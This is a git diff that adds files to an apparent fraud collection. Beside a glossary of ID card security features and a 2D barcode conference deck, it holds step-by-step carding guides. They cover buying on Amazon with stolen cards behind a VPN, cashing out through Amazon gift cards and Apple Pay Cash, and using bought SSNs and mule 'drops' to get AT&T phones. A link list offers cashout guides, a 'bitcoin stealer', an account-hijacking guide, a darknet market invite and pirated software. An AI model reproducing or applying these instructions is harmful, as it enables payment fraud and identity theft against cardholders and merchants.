+colors that appear to be identical under incandescent light but, under colored light, appear as different colors and
+patterns.
+(O1) Embossed Characters - Embossing is the impressing of raised characters to render a tactile pattern. The raised
+characters will also render the card uneven/not flat, thereby making the card more difficult to reprint. It is possible to
+develop unique embossing characters or logos that would not be included in commercially available embossers.
+(C1/2) Fine Line Background - Commonly called “guilloche patterns,” this detailing prevents accurate reproduction
+by copiers or standard document scanners, especially when used in conjunction with Rainbow Printing. A fine line
+background is constructed by using two or more intricately overlapping bands that repeat a lacy, web-like curve pattern
+on fine unbroken lines.
+(O1) Ghost Image or Ghost Printing - Digital printing technology has made possible the printing of a “ghost” image,
+a half tone reproduction of the original image, which is typically printed in the same area as the personal data. The
+second image appears as a light background to text data, significantly increasing the difficulty of altering the photo
+image or the data.
+(O1) Holograms - A hologram is a microscopically fine diffraction structure by which two or three-dimensional images
+are generated. The metallized reflective hologram has been a security feature for Visa and MasterCard cards for more
+than 10 years. The intrinsic security of the hologram results from a moveable image when viewed from different
+angles. It is not receptive to photography, photocopying, or scanning, and it requires highly specialized equipment to
+replicate designs.
+(C2/3) Ink Taggants - Special inks have been formulated with specific elements called “taggants.” These elements
+react to electromagnetic energy sourced from a remote reader. By using these inks and measuring their reflection, it is
+87
+
+possible to identify designated card groupings or types. These taggant-carrying products are known as “smart” (or
+“intelligent”) inks.
+(O1) Kinegrams - Kinegrams, like holograms, can be produced on a reflective or transparent material. However,
+unlike holograms, Kinegrams have only two-dimensional effects, and effects are observable under a wider variety of
+lighting conditions. Also, Kinegrams can incorporate asymmetric optical effects that is, different optical variable effects
+are viewable as the Kinegram is completely rotated (360 degrees).
+(O1/3) Laser-Encoded Optical Image - The image and text files used to personalize and issue a document is laser-
+encoded on to optical WORM media as a visible diffraction pattern image that is eye-readable under a variety of
+lighting conditions. The personalized laser-encoded optical image is extremely difficult to simulate as it has a two-
+dimensional appearance and the encoding registration on to the optical WORM media is at a sub-micron level of
+accuracy. The laser-encoded optical image cannot be removed from the reflective optical WORM media nor can it be
+duplicated or simulated by photocopying, photography or scanning. The laser-encoded optical image can be updated
+by incorporating new diffraction pattern images or alphanumeric text as the document is updated or processed.
+Furthermore, covert physical protection can be added by interleaving a copy of the digital file within the laser-encoded
+optical image. This personalized security feature is currently used in the Permanent Resident Card ("Green Card”)
+issued by the U.S. Immigration and Naturalization Service and the Border Crossing Card issued by the U.S.
+Department of State.
+(O1/2) Laser Engraving - Laser engraving has been used in Europe for more than 10 years on high-security plastic
+cards for printing highly tamper-resistant variable data on a card. Using an intense laser beam, data is burned (or
+“engraved”) into the inner core of the card. The information cannot be mechanically or chemically removed without
+damaging the surface of the card, thereby providing an extremely effective tamper-resistant barrier. Laser engraving
+can be performed with alpha-numeric characters, digitized images (such as photos or signatures), or bar-codes and
+OCR characters.
+(O1/2) Laser Perforation - This is the perforation of a document using laser technology. Unlike mechanical punching
+techniques, the holes made by the laser beam are free from burrs and can easily be confirmed by feeling. The holes
+created are also conical shape, with the entrance being larger than the exit.
+(C2/3) Machine-Readable Technologies - The card design can incorporate inclusion of many machine-readable
+technologies such as magnetic stripe, integrated circuit, 1D or 2D bar-codes, OCR, optical WORM media, machine-
+readable holograms, etc. Verification of the authenticity of the document, the data, and/or the person presenting the
+document can be accomplished with a card reader, depending on the technology employed. Common techniques to
+ensure data integrity include:
+– Check digits and data encryption (presumably with public key encryption)
+– For IC cards, tamper detection and chip disabling; and digital signatures for all data written to the chip.
+(O1) Metallic and Pearlescent Inks - Special iridescent inks fluctuate in brilliance depending upon the angle of
+illumination and viewing. The typical appearance of metallic or pearl luster inks cannot be mimicked by color copiers or
+reproduced by scanning and reprinting.
+(O1/2) Micro Optical Imaging - Text, line art, gray scale images and multi-reflectivity images can be engineered into
+optical WORM media at a resolution over 12,000dpi. This extremely high resolution is over 4 times higher than current
+security printing techniques and therefore extremely difficult to simulate. The micro optical images cannot be removed
+from the reflective optical WORM media nor can it be duplicated or simulated by photocopying, photography or
+scanning. Micro optical imaging is mainly made up of visible images but can also incorporate digital data that can be
+used for covert machine-readable security. Micro optical imaging is currently used in the U.S. Permanent Resident
+Card, Border Crossing Card and several other commercial applications.
+(O2) Microprinting - Miniature lettering, which is discernible under magnifying readers, can be incorporated into the
+fine line background or can be placed to appear as bold lines. Visa, MasterCard, and American Express include
+88
+
+microprint as a standard security feature. Microprint was also added to U. S. currency in 1990. Accurate reproduction
+of microprint cannot be accomplished as yet by photocopying or by commercially available color photography or color
+scanners.
+(C1/2) Moiré Pattern - A new pattern formed by the superpositioning of two patterns whose periodicities are not
+identical. Security designs can be made so that a scanner or copier will only display part of the pattern, resulting in a
+visible effect different from the original document. The original image can be designed so that a copy would reveal
+indication of reproduction - typically showing the word “VOID” or “COPY”. This process is also referred to as aliasing.
+(O1) Opacity Mark - The opacity mark, which is similar to a watermark, is a plastic that contains a unique translucent
+opacity mark. It is similar in principle and effect to a watermark found in paper documents and enjoys a high level of
+familiarity as a security feature.
+(O1/2) Optical Variable Device - Optically Variable Device (OVD) is a general term describing a security feature
+which changes appearance in some way when the angle of illumination or observation is changed. OVDs derive their
+significance for valuable documents and goods from the impossibility of copying them with usual reproduction
+techniques like color scanners and copiers. OVDs are often distinguished by being identified as either iridescent or
+non-iridescent.
+(O1/2) Optical Watermark - Fine line images can be engineered into optical WORM media at a resolution over
+12,000dpi. The optical watermark is then overwritten with a laser-encoded optical image, interlocking in sub-micron
+register, a preformatted document security feature with a laser encoded personalization security feature. This
+extremely high resolution is over 4 times higher than current security printing techniques and therefore extremely
+difficult to simulate. The optical watermark cannot be removed from the reflective optical WORM media nor can it be
+duplicated or simulated by photocopying, photography or scanning. Attempting to tamper or alter the optical watermark
+destroys the laser-encoded optical image. The optical watermark is currently used in the U.S. Permanent Resident
+Card and Border Crossing Card.
+(O1) Optically Variable Inks - Optically variable inks (OVI) can be incorporated into designs to create a striking color
+shift (for example, green to purple, gold to green, etc.) depending on the angle of light used in viewing the card. This
+material consists of a transparent colorless ink containing microscopic, advanced multi-layer interference structures.
+OVI is precious, and production is available to secure printers only. Since the availability of these inks is highly
+restricted, true counterfeiting is unlikely.
+(O1) Overlapping Data - Variable data, such as a digitized signature or text, can be “overlapped” with another field,
+such as a photo image. This technique makes it necessary to alter both fields if either one of them is changed, thereby
+increasing the tamper resistance of the card by making it more difficult to alter.
+(C2/3) Radio Frequency Technology - Use of radio frequency waves to activate and retrieve information from
+another source.
+(O1) Rainbow Printing - Sometimes called “iris printing,” involves a very subtle shift in color across a document.
+Well-designed patterns cannot be accurately reproduced on color copiers or through the use of document scanners.
+Widely perceived in Europe and Asia as an element of a secure document design, it is commonly used in conjunction
+with a fine line or medallion pattern in the background of the document.
+(O1) Redundant Data - Data can be displayed in more that one location on the ID, thereby raising the resistance to
+alteration. A simple visual inspection is required to determine if all data fields match. Redundant data can also be
+displayed in differing colors or fonts.
+(O2) Retroreflective Devices - Optical constructions that reflect light such that covert logos become visible over the
+entire document, and/or overt logos become more visible and reflective, when the document is viewed using a focused
+light source.
+89
+
+(O1) Seal/Signature over Photo/Information - A type of unique identification that overlaps the photo and text area.
+It can be a specific equipment number, state seal, coat of arms, flag, etc. The significance of this is to deter
+substituting the photo and/or personal information.
+(C2) Security Bonding - The card periphery on an optical memory card can incorporate a security bonding material
+with known characteristics to bond all layers together. Tampering with the card periphery in an attempt to access
+internal structures damages the known characteristics within the security bonding. This creates a tamper evident
+feature.
+(C2/3) Security Code - It is possible for high-resolution color printing systems to print a security code within the body
+of the color printed photograph. For example, a security code can be printed in a non-proportional font that can imbed
+characters on the edge or the bottom of the printed picture. The text can be printed on the image in colors that are
+complementary to the image or in black.
+(O1/2) Security Laminate - Transparent layers or films with an integrated security feature can be applied to a
+document with an adhesive or fused by heat. Available in a number of forms security laminates are designed to protect
+a document from alteration and provide tamper evidence.
+(O1/2) Security Thread - First seen in U.S. banknotes the thread is visible by viewing in reflected or transmitted light
+and can have text (positive or reverse) or other features on/in the thread. Security threads can be metal or plastic,
+transparent or opaque, colored or colorless. With special metallized film, demetallized text is invisible in reflected light
+and therefore cannot be copied reprographically. When viewed in transmitted light, however, the opaque aluminum
+letters are clearly visible.
+(C2/3) Specialized Inks - Special inks have been formulated with specific elements called “taggants.” These elements
+can be detected by a remote reader or viewer. By using these inks and measuring their presence, it is possible to
+identify designated card groupings or types. These taggant-carrying products are known as “smart” (or “intelligent”)
+inks.
+(O2) Thin-Film Interference Filters - Multiple-layer structures that produce color effects by interference.
+(O1/2) Transparent Holograms - It is possible to incorporate holographic effects in a clear, transparent topcoat that
+can be applied over variable printing. Through careful design and physical registration, the clear holographic topcoat
+can serve as a deterrent to alteration in addition to its counterfeit protection features. If an attempt is made to remove
+or alter the topcoat, tampering will be detectable without the need of special equipment. Because the transparent
+hologram design reflects light at differing angles, accurate reproduction with a copier or scanner is cannot be
+accomplished.
+(C2) Ultraviolet (UV) Printing - Ultraviolet ink, which can be applied either through offset or silk screen techniques,
+has long been accepted as a security feature for plastic cards. This invisible printing can be produced with the
+availability of a color shift when viewed under long-wave UV light sources. UV radiation is not visible to the human eye,
+but becomes visible when irradiated with a UV light. Custom UV fluorescing colors can be formulated that are not
+normally available commercially, thereby increasing resistance to counterfeiting.
+(C2) Void Pattern - A security device consisting of a period structure as an overt but not visible feature. When copied
+on a machine with a different periodicity, the resulting moiré pattern displays the word “VOID” or some other message.
+90
diff --git a/AMAZON ANDROID CARDING TECH_txt.md b/AMAZON ANDROID CARDING TECH_txt.md
new file mode 100644
index 0000000..0fc1c2e
--- /dev/null
+++ b/AMAZON ANDROID CARDING TECH_txt.md
@@ -0,0 +1,35 @@
+# AMAZON ANDROID CARDING TECH
+
+
+---
+
+CARDING AMAZON WITH AN ANDROID PHONE
+1-GET HMA VPN OR SOCKS 5 - DOWNLOAD HERE https://play.google.com/store/apps/details?id=com.hidemyass.hidemyassprovpn
+
+2-USE FIREFOX BROWSER ON ANDROID PHONE
+
+3-GET YOUR CREDIT CARD OF CHOICE READY (VISA ,AMEX ,MASTER CARD)
+
+4-CONNECT HMA OR SOCKS 5 AND CHANGE YOUR IP TO THE CREDIT CARD OWNERS ADDRESS.
+
+5-AFTER YOU HMA/SOCKS 5 IS CONNECTED GO TO GMAIL.COM AND MAKE A GMAIL ID ON CC OWNERS NAME --DONT VERIFY THE GMAIL WITH YOUR OWN NUMBER--
+
+6-NOW GO TO AMAZON.COM- DONT USE AMAZON.IN
+
+7-NOW CREATE A NEW ACCOUNT WITH ALL THE DETAILS
+
+8-AFTER ACCOUNT IS CREATED GO AND ADD AN ITEM TO CARD $100 IS A SAFE NO FLAGS MAXIMUM
+
+9-AFTER YOUR ITEM IS IN THE CART DONT CHECK OUT JUST SIGN OUT
+
+10-AFTER SIGN OUT PLUG YOUR PHONE INTO A CHARGER AND MAKE SURE IT DOESNT DIE AND MAKE DAMN SURE YOU NEVER DISSCONNECT FROM THE SOCKS OR HMA AND LEAVE IT FOR 5 HOURS
+
+11-AFTER 5 HOURS SIGN BACK IN AND CHECK OUT IF YOU WANT TO BUY THAT PRODUCT OR LEAVE IT
+
+12- SEARCH PRODUCT YOU WANT TO BUY AND ADD TO CART
+
+13-CLICK ON CART>CHECK OUT
+
+14-BILLING ADDRESS=CC OWNERS ADDRESS SHIPPING ADDRESS= YOUR RECIEVING ADDRESS
+
+15-COMPLETE PAYMENT VIA CREDIT CARD AND WAIT A FEW DAYS FOR DELIVERY
diff --git a/AMAZON CARDING MADE EASY_txt.md b/AMAZON CARDING MADE EASY_txt.md
new file mode 100644
index 0000000..3a4aa45
--- /dev/null
+++ b/AMAZON CARDING MADE EASY_txt.md
@@ -0,0 +1,20 @@
+# AMAZON CARDING MADE EASY
+
+
+---
+
+1, Put on UK VPN or SOCK5
+2. Clear all cookies with ccleaner or any good software
+3. Get UK cc (Visa works best)
+3. Go to hotmail.com then create email with name of cc ( If cc name is John Smith, make [You must be registered and logged in to see this link.] or similar)
+4. Go to amazon.co.uk and click gift card then select print now
+5. Pick a design and amount as 10 Pounds (Trust me)
+6. Put the name you are sending to with same last name as cc ( If cc name John Smith send to Jake Smith or similar)
+7. Click add to order then carry on and create new account with email you ade (john_smith@hotmail.co.uk)
+8. Fill in all details then make order
+9. In 5-7 minutes you will have your GC
+10. Then you can do again and again with same CC but always do 10 Pounds because its guaranteed to work if CC has balance
+11. From each good CC you should get 70 Pounds
+12. When CC stop working clear cookies change IP and do again
+13. You can add as many GC as you want to one Amazon acc.
+14. That's it ! Enjoy
diff --git a/APPLE PAY - original_pdf.md b/APPLE PAY - original_pdf.md
new file mode 100644
index 0000000..fb14fd4
--- /dev/null
+++ b/APPLE PAY - original_pdf.md
@@ -0,0 +1,59 @@
+# APPLE PAY - original
+
+
+---
+
+The new method of carding
+Let me first introduce myself. My name is Youngmoney. The name speaks for
+itself I am a fucking money maker and I am in my twenties. The reason I am rich?
+Almost Everyone can do it In the fraud game you can be stupid and succeed if you
+read a lot about it. I will not say everyone will succeed because you need to focus
+on your goals. I got kicked of college because I cant focus in class because that
+kind of stuff is not important for me. I like making thousands of money today
+instead of working 9-5 and that’s why I do this.
+There is a lot going on in the carding world. We had hard times finding new
+methods but apple pay is a gift, thank you 😉
+LET ME TELL YOU HOW YOU ARE GONNA MAKE THOUSANDS!!
+
+1. Get a new or an old Iphone or Ipad that has never been used with apple pay
+cash.
+2. Verify 1 of the accounts via apple pay cash. It has to match the name and
+address on a driver license and the phone.
+3. Once verified make another new accont on the same iphone/ipad if it let. If not
+get a new phone or ipad. U can verify if u want if not u dont have 2.
+4. Get a cc or debit log with email access and add it to apple pay. Once u have that
+verified via bank or email access u can now send cash from the debit or cc.
+5. 2 ways of adding money 1st way is to go to apple pay cash on the account the
+cc or debit is on and click add money and its gone ask how much. If verified add
+$1500 if not verified add $450. Once money is added u can go to imessage and
+send to your other account via your money in apple pay cash.
+6. The 2nd way is to send str8 to that person via imessage instead of adding it to
+that account.
+7. U can make 3 profiles per phone or ipad so just repeat steps. Apple DOES NOT
+charge back so once u want to withdraw funds u can add your bank account and
+send to that account. Can take 2-3 days to get deposited.
+TIPS: I suggest u get a tlo on the person who card it is just incase it get blocked u
+can call the bank and get it unblocked
+
+Goto Zillow.com
+Look for recent sold houses with your ZiPcode, then copy address and search on Truthfinder.com,
+You ll get the names of those staying in the house.
+Run background check on their names to make sure they don’t have any AT&T number in the past or
+present.
+Then go search for their SSN on Robocheck.cm
+Buy ssn from age about 40-50years and of same zip as your drop (same zip must be on drop I. D)
+Then if date of birth of ssn u buy is different from the one on whitepages or truthfinder or
+instantcheckmate... Then use the one from the background check I. E whitepages or truthfinder or icm
+Go-to AT&T.com with state or city or zip sock
+Add one or two iPhones to cart, select payment by installment ( i.e monthly payments just like a
+postpaid account) and make sure the total due today charge is not much and drop can afford to pay that
+amount before going to pick up cos most likely drop want to pick up at store they will tell him payment
+couldn't be processed and so will have to pay in cash to get the phone
+Put in ssn information to create the account but only use drop name, every other info e.g phone
+number, address, date of birth and ssn should be that of ssn, use any email you haven't used for at&t
+before but make sure DOB of SSN are correct that’s what they look at when calculating Credit Score.
+Checkout with ZIPCC and use drop name as cc name
+
+If card is live, you get thank you, track the order, status will be *in progress*..Then Keep an eye in your
+INBOX for Ready for pickup Mail, but make sure Client goes to pickup phones with cash Because they’ll
+ask to pay for tax Fee.
diff --git a/All about pdf417 - 2D Barcodes_pdf.md b/All about pdf417 - 2D Barcodes_pdf.md
new file mode 100644
index 0000000..1e10099
--- /dev/null
+++ b/All about pdf417 - 2D Barcodes_pdf.md
@@ -0,0 +1,272 @@
+# All about pdf417 - 2D Barcodes
+
+
+---
+
+FTA TECHNOLOGY
+CONFERENCE
+2D BARCODES AT A GLANCE
+Carlos Gonzalez
+CTO Dataintro Software
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+ABOUT 2D BARCODES
+• Appeared in 1988 (with Code 49 - Intermec)
+• Used in a variety of environments
+(surgical, electronic parts, transportation, stamps, taxes)
+• PDF 417 (Symbol - 1990)
+• More than 20 different 2D symbologies (2005)
+In 2003, Missouri started a new era of tax tools
+In 2004, AL, AZ, OK, MD, LA
+Our Phylosophy: 1 FORM = 1 BARCODE
+2D BARCODES = SAFETY NET
+1
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+1D & 2D BARCODES?
+2
+ycnadnudeR Datamatrix PDF
+3 of 9 417
+1D Reading
+2D Reading
+•ECL in form of checksum •ECL in form of codewords
+•Reads with Laser •Reads with Imager (CCD)
+•Small capacity •Large capacity(*)
+•Used as a Key to DB •Portable Database
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+THE WORLD OF 2D BARCODES
+STACKED TYPE
+Codablock
+Code 49 PDF 417
+MATRIX TYPE
+Code 1 Datamatrix QR Code
+3di OTHAErrRa yT TYaPgE DataGlyph
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+HOW TO GENERATE 2D BARCODES
+Libraries
+• Have to be installed with software application
+• Software app. has to be developed & maintained
+Fonts
+• Have to be installed in the user PC (at least once)
+• Need a specific encoding algorithm (similar as libraries)
+PDF Forms
+• Do not install libraries
+• Do not install fonts
+• Leverage a general purpose platform (PDF)
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+HOW TO READ 2D BARCODES
+Software (needs previous scan to Image)
+AllMyPapers, IBM IFP, Pegasus,
+TeleForm (Verity), Seaport, etc.
+Starting at 1,000$
+Hardware (Laser & CCD)
+Symbol, Datalogic, Metrologic
+CCD, Laser
+Starting at 350$
+3
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+PAPER FORMS DATA CAPTURE ALTERNATIVES
+OCR, OMR, ICR (Pattern based methods)
+EXCEPTION HANDLING
+MANUAL HAND KEY (single, double, triple)
+BOTH HAVE ERRORS (& FALSE POSITIVES)
+2D BARCODES are 100% ERROR FREE
+•Less expensive to read (.90 vs .30 )
+$ $
+•No error or false positives
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+Starring PDF 417
+PDF= Portable Data File
+ISO:IEC 15438 (SYMBOL TECH.)
+The basic unit: Mr. Codeword
+(a 417 pattern)
+23134121
+1 BARCODE = 925 MAX DATA CW
+4
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+ANATOMY OF A PDF 417
+Start Left Row DATA Right R. Stop
+Pattern Indicator CODEWORDS Indicator Pattern
+(1-30 columns)
+5
+ENOZ
+TEIUQ
+GNIDAEL
+ENOZ
+TEIUQ
+GNILIART
+SYMBOL CAPACITY
+1,850 TEXT - 1,108 BYTE - 2,710 NUMBER (ECL-0)
+2 CharPerCw 1.2 CharPerCw 2.93 CharPerCw
+1,726 TEXT - 1,033 BYTE - 2,528 NUMBER (ECL-5 )
+min rec
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+ROWS AND COLUMNS
+ROW
+2 COLUMNS OVERHEAD
+10 COLUMNS
+she sells sea shells by the sea shore she
+sells sea shells by the sea shore (76)
+Number of COLUMNS is between 1-30
+Number of ROWS is between 3-90
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+ECL : Error Correction Level
+ECL 4 (118 DATA : 32 ECC)
+ECL 6 (118 DATA : 128 ECC)
+ECL 8 (118 DATA : 512 ECC)
+MANUFACTURER
+RECOMMENDATIONS (SYMBOL):
+When I find myself in times of
+trouble Mother Mary comes to Always try to maintain printing
+me speaking words of wisdom,
+let it be. And in my hour of quality.
+darkness She is standing right
+in front of me speaking words
+of wisdom, let it be. Let it Do not compensate poor
+be, let it be (230)
+printing quality with a raise of
+ECL
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+RESOLUTION & X:Y RATIO
+X
+1:1 MODULE
+RESOLUTION (X)
+2:1 measured in mils
+1 mil = 1/10,000 inch
+3:1
+4X
+3X
+2X
+4:1
+MANUFACTURER RECOMMENDATIONS (SYMBOL):
+At least minimum recommended ECL: 3x
+Less than minimum recommended ECL: 4x
+6
+Y
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+2D BARCODE PARAMETERS
+QUANTITY OF DATA
+COMPRESSED, UNCOMPRESSED
+AVAILABLE PHYSICAL SPACE
+AS MUCH AS POSSIBLE AT DESIGN TIME, REDESIGN, SEPARATE SHEET
+READING METHOD PRINTING ENV.
+HARD, SOFT, FAX CONTROLLED vs UNCONTROLLED
+NUM. COLUMNS ECL
+1-30 1-8
+RESOLUTION X:Y RATIO
+10-15 2:1 - 3:1
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+WHAT’S INSIDE A 2D BARCODE?
+ALPHANUMERIC DATA
+- Static info (owner): DOR ID, Form Version...
+- Variable info (owner): Date, Time...
+- Control Characters (TAB, CR, F keys)
+- Variable info (user): User Data...
+- Any Format (CSV,TAB,XML)
+VALUABLE FORM INFO
+- NumChars, TimeToFill, ViewerVersion, etc...
+7
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+MACRO PDF417
+Up to 99,999 symbols can be chained
+together and be read as one file
+Totalling 100+ MB
+• Macro vs Distributed 2D Barcoding
+MICRO PDF417 (aka “Truncated”)
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+MULTI PAGE BARCODING OPTIONS
+1 BC = 1 Page 1 BC = 1 Form 1 Page for all BCs.
+Needs 3 Watch print order (what do I sign?)
+captures
+DON’T ALLOW THE USER TO
+PRINT THE FORM PARTIALLY
+8
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+2D BARCODES & ENCRYPTION
+2D BARCODES ARE FOR DATA CAPTURE
+- What if we cannot read?
+Controlled vs Uncontrolled (Print env.)
+- Sign readable set
+DATA + KEY = Encrypted DATA
+Technology = Rsytbwpwyz
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+FAXES & 2D BARCODES
+• Capture from FAX
+• Symbol needs more resolution
+9
+
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+FIND THIS PRESENTATION AT:
+www.dataintro.com/fta/
+send questions to:
+carlosg@dataintro.com
+TO KNOW MORE ABOUT 2D BARCODES...
+WWW.ADAMS1.COM
+WWW.SYMBOL.COM
+FTA TECHNOLOGY CONFERENCE
+August 7-10 | Columbus, OH
+2D Barcodes at a Glance
+Carlos Gonzalez (Dataintro Software)
+2D BARCODES AT A GLANCE
+THANK YOU!
+10
diff --git a/BITCOINMEGAPACK FASTERLINK_txt.md b/BITCOINMEGAPACK FASTERLINK_txt.md
new file mode 100644
index 0000000..53cd972
--- /dev/null
+++ b/BITCOINMEGAPACK FASTERLINK_txt.md
@@ -0,0 +1,179 @@
+# BITCOINMEGAPACK FASTERLINK
+
+
+---
+
+http://www107.zippyshare.com/v/JdfylNYK/file.html 3 WORKING BITCOIN CASHOUT METHODS
+http://www107.zippyshare.com/v/hyOZIsih/file.html CC/CVV BITCOIN CASHOUT METHOD
+http://www120.zippyshare.com/v/y0tRfRDq/file.html CREDIT CARD TO BITCOIN
+http://www120.zippyshare.com/v/7SWPefDX/file.html CC TO BITCOIN SKRILL
+http://www120.zippyshare.com/v/vakljHuf/file.html CREDIT CARD TO BITCOIN VIRWOX
+http://www117.zippyshare.com/v/Lxd0u0Ft/file.html STOLEN PAYPAL TO BITCOIN
+http://www96.zippyshare.com/v/Wt6nygtz/file.html MR BITCOIN THIEF
+http://www17.zippyshare.com/v/m6OUp7BQ/file.html CC/PAYPAL INTO BITCOIN/CASH RUNESCAPE 1
+http://www17.zippyshare.com/v/m6OUp7BQ/file.html CC/PAYPAL TO BITCOIN/CASH RUNESCAPE 2
+http://www51.zippyshare.com/v/ubastxjD/file.html SEVERAL BITCOIN CASHOUT METHODS
+http://www8.zippyshare.com/v/F1vc07d7/file.html STOLEN CREDIT CARDS TO BITCOIN
+https://mega.nz/#!PFpVXQrC!HeMt9sq6Ns3JCKalq0isgSLw_B5zr9CySOgE0sOrBw4 file password ny38eyjpq BITCOIN STEALER AND MASS ADDRESS GENERATOR
+http://www107.zippyshare.com/v/IiujXrbZ/file.html CARDING VOCABULARY
+http://www107.zippyshare.com/v/uVRdtjgD/file.html UK CASHOUT
+http://www120.zippyshare.com/v/lGCxqd18/file.html CC/CVV/FULLZ SHOPPING GUIDE
+http://www120.zippyshare.com/v/1DrZcvFF/file.html CREDIT CARD CASHOUT METHOD 1
+http://www96.zippyshare.com/v/8KM7VNSY/file.html DONT GET CAUGHT CARDING GUIDE
+http://www8.zippyshare.com/v/FpyjLSYK/file.html ULTIMATE EBAY/PAYPAL SCAM & CASHOUT GUIDE
+http://www8.zippyshare.com/v/1KIytvuK/file.html DUMP CASHOUT
+
+BITCOIN_DOMINATION.PDF
+http://www76.zippyshare.com/v/zl1wBYgh/file.html
+
+bitcoin_pioneer.pdf
+http://www76.zippyshare.com/v/zXhLK0ar/file.html
+
+Bitcoin_Step_By_Step_2nd_Edition.pdf
+http://www76.zippyshare.com/v/NTrEfsvn/file.html
+
+Bitcoin-základy-a-stavební-kameny.pdf
+http://www76.zippyshare.com/v/JfiSVStL/file.html
+
+Crypto_Cash.pdf
+http://www76.zippyshare.com/v/nxvAnZdF/file.html
+
+How to Earn Bitcoins for Free! Udated 1.pdf
+http://www76.zippyshare.com/v/gCVDDDlA/file.html
+
+How to get 100,000 bits.pdf
+http://www76.zippyshare.com/v/ITowUhaa/file.html
+
+The Bitcoin Bible.pdf
+http://www76.zippyshare.com/v/bdhnhTNI/file.html
+
+The EASIEST Way to Make 200000+ Satoshi Right Now.pdf
+http://www76.zippyshare.com/v/71NXH977/file.html
+
+The-Ultimate-Bitcoin-Money-Making-Guide.pdf
+http://www76.zippyshare.com/v/ENUVFBDE/file.html
+
+virtual bitcoin.pdf
+http://www76.zippyshare.com/v/UY1qfbP2/file.html
+
+Dream Market Invite
+http://lchudifyeqm4ldjj.onion/?aZi=176866
+-----------------------------------------------------------------------------------------------
+How To Make A Girl Squirt
+http://ultrashare.net/hosting/fl/1906014eb7
+-----------------------------------------------------------------------------------------------
+TuneUp Utilities 2014
+http://freetexthost.com/5xod3csk25
+-----------------------------------------------------------------------------------------------
+CCleaner All edition
+http://freetexthost.com/pkusnh335s
+-----------------------------------------------------------------------------------------------
+Daemon Tools Pro Advanced
+http://freetexthost.com/y0yio2xr5n
+-----------------------------------------------------------------------------------------------
+Sony Vegas Pro 13 (64-BIT)
+http://freetexthost.com/gex3jwnxcp
+-----------------------------------------------------------------------------------------------
+12,000+ Kindle Book Pack
+https://mega.co.nz/#!UlYW1I4C!cO6j3x69piPdiZ_3utJHwkr2fy1i73VztNOpLJ03X6w Password: soitgoes
+-----------------------------------------------------------------------------------------------
+200 Amazing Ebooks
+https://mega.co.nz/#!F0wWXLxS!ZuD5R2ZQi5T7wu3QtIOqIEe-jlcNEZcvySzkw8gEz_E Password: soitgoes
+-----------------------------------------------------------------------------------------------
+SNES Loader with Complete US Romset and Front End Interface
+https://mega.co.nz/#!xFkQ3CCY!bPo6qEFVurEntuJUO1FG9kLZzI10yBm_GJT6-Q5z-qg Password: soitgoes
+-----------------------------------------------------------------------------------------------
+Adobe Photoshop CS6 Extended 13.1.2 Portable (64-bit):
+https://mega.co.nz/#!Ud0BiSIa!KlVZtWrlwJkJd5LWHB5DnEd522lnZ5QOS9nHfVugK1M Password: soitgoes
+-----------------------------------------------------------------------------------------------
+Zip File Password Cracker
+https://mega.co.nz/#!2Z0XgaIC!Hr4aLlRqopiNsT_8W-homES4tMr-3w6GsTMlsErPdWA Password: soitgoes
+-----------------------------------------------------------------------------------------------
+Hijack ALMOST any account with a Phone number
+http://freetexthost.com/hqharumvte
+-----------------------------------------------------------------------------------------------
+25 Classic Books
+https://mega.nz/#!VM5xHRbA!W6aBlpRvIfbg68DvgeLuD9lZhzRyIlKERQk6svCn5xg
+-----------------------------------------------------------------------------------------------
+Make Money on Autopilot
+https://mega.nz/#!RYJlWQAJ!vdCJ_KbBKLogZeQ5C5QswgyOYfv1eVF3CTiO3VTCq8c
+-----------------------------------------------------------------------------------------------
+How To Make Fire works
+https://mega.nz/#!QZZ2kKAR!HuPHHXM4g5_fdystknWfiuyBZxu8J20OJbvbO2g9wwU
+-----------------------------------------------------------------------------------------------
+How To Make Alcohol
+https://mega.nz/#!QBxBjCoD!88gTlei9wl8mTDGQDMavssLCEB3VRtJDOjAVHDxgb1Y
+-----------------------------------------------------------------------------------------------
